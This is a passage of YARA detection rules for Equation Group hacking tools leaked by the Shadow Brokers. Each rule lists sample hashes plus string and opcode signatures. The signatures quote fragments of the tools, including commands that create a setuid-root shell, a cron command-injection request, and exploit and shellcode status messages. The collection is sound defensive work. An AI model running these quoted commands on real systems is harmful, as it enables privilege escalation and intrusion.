"Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984" hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef" strings: $s1 = "# default is to dump out all scanned hosts found" fullword ascii $s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" fullword ascii $s3 = "sadmind is available on two ports, this also works)" fullword ascii $s4 = "-x IP gives \\\"hostname:# users:load ...\\\" if positive xwin scan" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 40KB and 1 of them ) or ( 2 of them ) } rule EquationGroup__funnelout_v4_1_0_1 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash2 = "457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33" strings: $s1 = "header(\"Set-Cookie: bbsessionhash=\" . \\$hash . \"; path=/; HttpOnly\");" fullword ascii $s2 = "if ($code =~ /proxyhost/) {" fullword ascii $s3 = "\\$rk[1] = \\$rk[1] - 1;" fullword ascii $s4 = "#existsUser($u) or die \"User '$u' does not exist in database.\\n\";" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them ) } rule EquationGroup__magicjack_v1_1_0_0_client { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1" strings: $s1 = "temp = ((left >> 1) ^ right) & 0x55555555" fullword ascii $s2 = "right ^= (temp << 16) & 0xffffffff" fullword ascii $s3 = "tempresult = \"\"" fullword ascii $s4 = "num = self.bytes2long(data)" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 80KB and 3 of them ) or ( all of them ) } rule EquationGroup__ftshell { meta: description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" super_rule = 1 hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893" hash4 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951" strings: $s1 = "if { [string length $uRemoteUploadCommand]" fullword ascii $s2 = "processUpload" fullword ascii $s3 = "global dothisreallyquiet" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them ) } /* Yara Rule Set Author: Florian Roth Date: 2017-04-09 Identifier: Equation Group hack tools leaked by ShadowBrokers */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_store_linux_i386_v_3_3_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "abc27fda9a0921d7cf2863c29768af15fdfe47a0b3e7a131ef7e5cc057576fbc" strings: $s1 = "[-] Failed to map file: %s" fullword ascii $s2 = "[-] can not NULL terminate input data" fullword ascii $s3 = "[!] Name has size of 0!" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 60KB and all of them ) } rule EquationGroup_morerats_client_genkey { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "0ce455fb7f46e54a5db9bef85df1087ff14d2fc60a88f2becd5badb9c7fe3e89" strings: $x1 = "rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')" fullword ascii $x2 = "client_auth = binascii.hexlify(lo_execute('openssl rand 16'))" fullword ascii condition: ( filesize < 3KB and all of them ) } rule EquationGroup_cursetingle_2_0_1_2_mswin32_v_2_0_1 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61" strings: $s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii $s2 = "0123456789abcdefABCEDF:" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_cursesleepy_mswin32_v_1_0_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352" strings: $s1 = "A}%j,R" fullword ascii $op1 = { a1 e0 43 41 00 8b 0d 34 44 41 00 6b c0 } /* Opcode */ $op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 2 of them ) } rule EquationGroup_porkserver_v3_0_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "7b5f86e289047dd673e8a09438d49ec43832b561bac39b95098f5bf4095b8b4a" strings: $s1 = "%s: %s rpcprog=%d, rpcvers = %d/%d, proto=%s, wait.max=%d.%d, user.group=%s.%s builtin=%lx server=%s" fullword ascii $s2 = "%s/%s server failing (looping), service terminated" fullword ascii $s3 = "getpwnam: %s: No such user" fullword ascii $s4 = "execv %s: %m" fullword ascii $s5 = "%s/%s: getsockname: %m" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 70KB and 4 of them ) } rule EquationGroup_cursehelper_win2k_i686_v_2_2_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1" strings: $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" fullword ascii $op1 = { 8d b5 48 ff ff ff 89 34 24 e8 56 2a 00 00 c7 44 } /* Opcode */ $op2 = { e9 a2 f2 ff ff ff 85 b4 fe ff ff 8b 95 a8 fe ff } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 500KB and all of them ) } rule EquationGroup_morerats_client_addkey { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b" strings: $x1 = "print ' -s storebin use storebin as the Store executable\\n'" fullword ascii $x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" fullword ascii $x3 = "print ' -k keyfile the key text file to inject'" fullword ascii condition: ( filesize < 20KB and 1 of them ) } rule EquationGroup_noclient_3_3_2 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72" strings: $x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii $x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii $x3 = "noclient: failed to execute %s: %s" fullword ascii $x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii $s5 = "Attempting connection from 0.0.0.0:" ascii condition: ( filesize < 1000KB and 1 of them ) } rule EquationGroup_curseflower_mswin32_v_1_0_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf" strings: $s1 = "<pVt,<et(<st$<ct$<nt" fullword ascii $op1 = { 6a 04 83 c0 08 6a 01 50 e8 10 34 00 00 83 c4 10 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_tmpwatch { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1" strings: $s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" fullword ascii $s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" fullword ascii condition: ( filesize < 1KB and 1 of them ) } rule EquationGroup_orleans_stride_sunos5_9_v_2_4_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "6a30efb87b28e1a136a66c7708178c27d63a4a76c9c839b2fc43853158cb55ff" strings: $s1 = "_lib_version" fullword ascii $s2 = ",%02d%03d" fullword ascii $s3 = "TRANSIT" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and all of them ) } rule EquationGroup_morerats_client_noprep { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb" strings: $x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" fullword ascii $x2 = "The NOPEN-args provided are injected into infile if it is a valid" fullword ascii $x3 = " -i do not autokill after 5 hours" fullword ascii condition: ( filesize < 9KB and 1 of them ) } rule EquationGroup_cursezinger_linuxrh7_3_v_2_0_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "af7c7d03f59460fa60c48764201e18f3bd3f72441fd2e2ff6a562291134d2135" strings: $s1 = ",%02d%03d" fullword ascii $s2 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii $s3 = "__strtoll_internal" fullword ascii $s4 = "__strtoul_internal" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 400KB and all of them ) } rule EquationGroup_seconddate_ImplantStandalone_3_0_3 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511" strings: $s1 = "EFDGHIJKLMNOPQRSUT" fullword ascii $s2 = "G8HcJ HcF LcF0LcN" fullword ascii $s3 = "GhHcJ0HcF@LcF0LcN8H" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 1000KB and all of them ) } rule EquationGroup_watcher_solaris_i386_v_3_3_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "395ec2531970950ffafde234dded0cce0c95f1f9a22763d1d04caa060a5222bb" strings: $s1 = "getexecname" fullword ascii $s2 = "invalid option `" fullword ascii $s6 = "__fpstart" fullword ascii $s12 = "GHFIJKLMNOPQRSTUVXW" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 700KB and all of them ) } rule EquationGroup_gr_dev_bin_now { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4" strings: $x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" fullword ascii $x2 = "exec /usr/share/redmin/cgi/redmin" fullword ascii condition: ( filesize < 1KB and 1 of them ) } rule EquationGroup_gr_dev_bin_post { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591" strings: $x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii condition: ( filesize < 1KB and all of them ) } rule EquationGroup_curseyo_win2k_v_1_0_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6" strings: $s1 = "0123456789abcdefABCEDF:" fullword ascii $op0 = { c6 06 5b 8b bd 70 ff ff ff 8b 9d 64 ff ff ff 0f } /* Opcode */ $op1 = { 55 b8 ff ff ff ff 89 e5 83 ec 28 89 7d fc 8b 7d } /* Opcode */ $op2 = { ff 05 10 64 41 00 89 34 24 e8 df 1e 00 00 e9 31 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 200KB and all of them ) } rule EquationGroup_gr { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262" strings: $s1 = "if [ -f /tmp/tmpwatch ] ; then" fullword ascii $s2 = "echo \"bailing. try a different name\"" fullword ascii condition: ( filesize < 1KB and all of them ) } rule EquationGroup_curseroot_win2k_v_2_1_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603" strings: $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii $op0 = { c7 44 24 04 ff ff ff ff 89 04 24 e8 46 65 01 00 } /* Opcode */ $op1 = { 8d 5d 88 89 1c 24 e8 24 1b 01 00 be ff ff ff ff } /* Opcode */ $op2 = { d3 e0 48 e9 0c ff ff ff 8b 45 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 400KB and $s1 and 2 of ($op*) ) } rule EquationGroup_cursewham_curserazor_cursezinger_curseroot_win2k { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225" hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e" strings: $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii $s3 = ",%02d%03d" fullword ascii $s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii $op1 = { 7d ec 8d 74 3f 01 0f af f7 c1 c6 05 } /* Opcode */ $op2 = { 29 f1 89 fb d3 eb 89 f1 d3 e7 } /* Opcode */ $op3 = { 7d e4 8d 5c 3f 01 0f af df c1 c3 05 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) } rule EquationGroup_watcher_linux_i386_v_3_3_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8" strings: $s1 = "invalid option `" fullword ascii $s8 = "readdir64" fullword ascii $s9 = "89:z89:%r%opw" fullword wide $s13 = "Ropopoprstuvwypypop" fullword wide $s17 = "Missing argument for `-x'." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 700KB and all of them ) } rule EquationGroup_charm_saver_win2k_v_2_0_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f" strings: $s2 = "0123456789abcdefABCEDF:" fullword ascii $op0 = { b8 ff ff ff ff 7f 65 eb 30 8b 55 0c 89 d7 0f b6 } /* Opcode */ $op2 = { ba ff ff ff ff 83 c4 6c 89 d0 5b 5e 5f 5d c3 90 } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_cursehappy_win2k_v_6_1_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632" strings: $op1 = { e8 24 2c 01 00 85 c0 89 c6 ba ff ff ff ff 74 d6 } /* Opcode */ $op2 = { 89 4c 24 04 89 34 24 89 44 24 08 e8 ce 49 ff ff } /* Opcode */ condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_morerats_client_Store { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465" strings: $s1 = "[-] Failed to mmap file: %s" fullword ascii $s2 = "[-] can not NULL terminate input data" fullword ascii $s3 = "Missing argument for `-x'." fullword ascii $s4 = "[!] Value has size of 0!" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 60KB and 2 of them ) } rule EquationGroup_watcher_linux_x86_64_v_3_3_0 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3" strings: $s1 = "forceprismheader" fullword ascii $s2 = "invalid option `" fullword ascii $s3 = "forceprism" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 900KB and all of them ) } rule EquationGroup_linux_exactchange { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" super_rule = 1 hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6" hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec" hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b" hash4 = "15e12c1c27304e4a68a268e392be4972f7c6edf3d4d387e5b7d2ed77a5b43c2c" strings: $x1 = "[+] looking for vulnerable socket" fullword ascii $x2 = "can't use 32-bit exploit on 64-bit target" fullword ascii $x3 = "[+] %s socket ready, exploiting..." fullword ascii $x4 = "[!] nothing looks vulnerable, trying everything" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and 1 of them ) } rule EquationGroup_x86_linux_exactchange { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" super_rule = 1 hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6" hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec" strings: $x1 = "kernel has 4G/4G split, not exploitable" fullword ascii $x2 = "[+] kernel stack size is %d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 1000KB and 1 of them ) } /* Yara Rule Set Author: Florian Roth Date: 2017-04-15 Identifier: Equation Group Toolset - Windows Folder Reference: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8" hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10" hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed" strings: $x1 = "[-] Failed to Prepare Payload!" fullword ascii $x2 = "ShellcodeStartOffset" fullword ascii $x3 = "[*] Waiting for AuthCode from exploit" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Explodingcantouch_1_2_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444" strings: $x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii $s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." fullword ascii $s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 150KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Architouch_1_0_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc" strings: $s1 = "[+] Target is %s" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 300KB and all of them ) } rule EquationGroup_Toolset_Apr17_Erraticgopher_1_0_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052" strings: $x1 = "[-] Error appending shellcode buffer" fullword ascii $x2 = "[-] Shellcode is too big" fullword ascii $x3 = "[+] Exploit Payload Sent!" fullword ascii $x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 150KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Esteemaudit_2_1_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6" strings: $x1 = "[+] Connected to target %s:%d" fullword ascii $x2 = "[-] build_exploit_run_x64():" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Darkpulsar_1_1_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a" strings: $x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" fullword ascii $x2 = "[%s] - Error building DLL loading shellcode" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and all of them ) } rule EquationGroup_Toolset_Apr17_Educatedscholar_1_0_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d" strings: $x1 = "[+] Shellcode Callback %s:%d" fullword ascii $x2 = "[+] Exploiting Target" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 150KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13" strings: $x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" fullword ascii $x2 = "[.] Sending shellcode to inject DLL" fullword ascii $x3 = "[-] Error setting ShellcodeFile name" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Erraticgophertouch_1_0_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad" strings: $x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" fullword ascii $x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" fullword ascii $x3 = "[+] Bound to Dimsvc, target IS vulnerable" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 30KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Smbtouch_1_1_1 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a" strings: $x1 = "[+] Target is vulnerable to %d exploit%s" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 400KB and all of them ) } rule EquationGroup_Toolset_Apr17_Educatedscholartouch_1_0_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8" strings: $x1 = "[!] A vulnerable target will not respond." fullword ascii $x2 = "[-] Target NOT Vulernable" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 30KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Esteemaudittouch_2_1_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281" strings: $x1 = "[-] Touching the target failed!" fullword ascii $x2 = "[-] OS fingerprint not complete - 0x%08x!" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Rpctouch_2_1_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887" strings: $x1 = "[*] Failed to detect OS / Service Pack on %s:%d" fullword ascii $x2 = "[*] SMB String: %s (%s)" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 80KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Mofconfig_1_0_0 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2" strings: $x1 = "[-] Get RemoteMOFTriggerPath error" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and all of them ) } rule EquationGroup_Toolset_Apr17_Easypi_Explodingcan { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94" hash2 = "97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4" strings: $x1 = "[-] %s - Target might not be in a usable state." fullword ascii $x2 = "[*] Exploiting Target" fullword ascii $x3 = "[-] Encoding Exploit Payload failed!" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 100KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c" strings: $x1 = "[-] The target is NOT vulnerable" fullword ascii $x2 = "[+] The target IS VULNERABLE" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 50KB and 1 of them ) } rule EquationGroup_Toolset_Apr17_Iistouch_1_2_2 { meta: description = "Detects EquationGroup Tool - April Leak" author = "Florian Roth" reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation" date = "2017-04-15" hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6" strings: 